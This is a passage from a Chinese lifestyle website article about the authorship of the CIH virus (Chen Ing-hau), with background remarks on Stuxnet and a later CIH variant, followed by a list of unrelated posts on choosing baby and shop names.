吊诡的是,第一批发作的Stuxnet蠕虫的60%都将目标定在了伊朗布什尔核电站的西门子工控系统上,这个核电站正是美国怀疑伊朗制造核武器的基地。美国国家网络安全与通讯整合中心主管迈格克指出,属木马程序的Stuxnet一旦找到西门子WinCC装置,就能接管西门子设施的关键操作系统,并在十分之一秒里“封住”设备的操作。而有关安全组织也认为,制造Stuxnet的团体应资金充裕,成员约5到10人,耗费半年筹备。
不过Stuxnet最终不仅开始攻击伊朗核电站,它甚至开始接二连三的变种,开始攻击全球的西门子工控系统,连美国自己也成为了受害的倒霉蛋之一。

陈盈豪是谁,cih病毒是谁编写的图3

CIH病毒属于什么病毒


旧CIH病毒是由台湾陈盈豪Chen Ing Hau研发的病毒取开头字母CIH
新CIH”病毒危险等级判别为四星,反病毒工程师发现其中含有“yangming”字符串。由此推测该病毒可能是中国人制造的。
他的理由是“字符串‘yangming’应该是作者表明自己身份的标志,可能是作者叫做‘杨明、杨鸣’,或者作者试图通过编写此病毒,而像CIH病毒的作者陈盈豪一样‘扬名’立万。”

陈盈豪是谁,cih病毒是谁编写的图4

以上就是关于陈盈豪是谁,cih病毒是谁编写的的全部内容,以及陈盈豪的相关内容,希望能够帮到您。

版权声明:本文来自用户投稿,不代表【悠生活】立场,本平台所发表的文章、图片属于原权利人所有,因客观原因,或会存在不当使用的情况,非恶意侵犯原权利人相关权益,敬请相关权利人谅解并与我们联系(邮箱:toplearningteam@gmail.com)我们将及时处理,共同维护良好的网络创作环境。

(33)
上一篇 2022年12月12日 10:52
下一篇 2022年12月12日 11:01

相关推荐

  • 灯具店起名大全 好听的四个字灯具店名

    光影轩阁、明灯世家、璀璨星空等。为灯具店起一个好听且易于记忆的名字,不仅能够吸引顾客的注意,还能体现店铺的特色和定位。以下是一些精选的四字灯具店名,适合寻求优雅、简洁且具有品牌感的商家。…

    2024-08-06
  • 姓孙的女宝宝名字洋气 孙姓女宝宝名字取名大全

    孙艾琳、孙安妮、孙贝拉等。在中国,为新生儿取名是一件充满喜悦和期待的事情。家长们往往会希望名字既好听又富有内涵,同时还要具有时代感和国际化的气息。对于姓孙的女宝宝来说,取一个洋气的名字,不仅要考虑到名字的音韵美,还要考虑到名字的意义和文化内涵。这是一些建议和名字推荐,供家长们参考。…

    2024-08-05
  • 取能招来好运气的舒氏名字 能招来好运气的舒氏名字推荐

    舒安、舒博、舒晨等。在中国传统文化中,名字不仅仅是一个称呼,更是承载着父母对孩子未来的美好祝愿和期望。舒姓,作为中国的一个古老姓氏,有着悠久的历史和文化底蕴。取一个能招来好运气的舒氏名字,除了要考虑音韵、意义和五行外,还可以结合现代的审美和文化趋势。提供一些能招来好运气的舒氏名字,供参考。…

    2024-08-05
  • 最潮最个性酒吧名字 创意高品位酒吧名字大全

    时光隧道、梦境边缘、星际穿越等。酒吧,作为现代都市夜生活的一个缩影,不仅是社交的场所,更是个性与品味的展示平台。一个独特且富有创意的酒吧名字,能够吸引顾客的目光,提升酒吧的品牌形象。为您带来一系列最潮最个性的酒吧名字,让您的酒吧在众多竞争者中脱颖而出。…

    2024-08-04
  • 五行属土的男孩名字有哪些 有涵养寓意好名字推荐

    坤宇、培杰、圣坤等。在中国传统文化中,五行理论认为万物都由木、火、土、金、水五种元素构成,而每个元素都有其独特的属性和象征意义。对于五行缺土的男孩来说,选择一个属土的名字,不仅能够平衡五行,还寓意着稳重、踏实和富有内涵。提供一些五行属土的男孩名字,供参考。…

    2024-08-03
  • 霸气的王者荣耀名字大全 24个王者荣耀霸气名字推荐

    龙战于野、剑指苍穹、狂风怒斩等。王者荣耀作为当下非常流行的一款MOBA手游,不仅游戏玩法吸引人,玩家之间的互动和个性化展示也是游戏的一大亮点。在这款游戏中,一个霸气的名字往往能够给玩家带来额外的自信和影响力。以下是一些建议的霸气王者荣耀名字,供您参考。…

    2024-08-01
  • 八字喜木男孩名字大全 适合八字喜木男孩的名字推荐

    梓轩、松岩、柏森等。在中国传统文化中,根据八字五行为孩子取名是一种充满智慧的做法。对于八字中喜木的男孩,选择具有木属性的名字,不仅能够平衡五行,还能寓意孩子如树木般茁壮成长,拥有坚韧不拔的品质。推荐一些适合八字喜木男孩的名字,供参考。…

    2024-07-31
  • 推荐好听又有创意的乳名 男孩女孩都能用

    小豆丁、小糖果、小布丁等。乳名,是父母对孩子最亲切的称呼,它不仅承载着家庭的温暖,也反映了父母对孩子的爱和期望。这是一些好听又有创意的乳名推荐,适合男孩和女孩使用。…

    2024-07-30
  • 最吉利的微信昵称推荐 招财又吉利的微信名字

    金运亨通、福泽深厚、财源广进等。当我们在数字世界中穿梭,微信作为我们日常交流的重要平台,不仅是一个简单的通讯工具,还承载着我们的个性、情感与期待。一个既招财又吉利的微信昵称,就像是随身携带的一枚幸运符,能在无形中为我们增添一份好运与正能量。那么,就让我为您精心挑选并推荐一系列最吉…

    2024-07-28
  • 水最旺的男孩名字有哪些 生辰八字喜水的男孩名字推荐

    浩宇、泽涛、洪霖等。在为孩子取名的过程中,许多家长都希望能赋予孩子一个寓意美好、独特而又契合其命理的名字。对于生辰八字喜水的男孩来说,选择一个水最旺的名字,不仅能增添其运势,还能展现出独特的气质和魅力。 1、浩宇 “浩”字,本义为水势浩大,有着磅礴…

    2024-07-27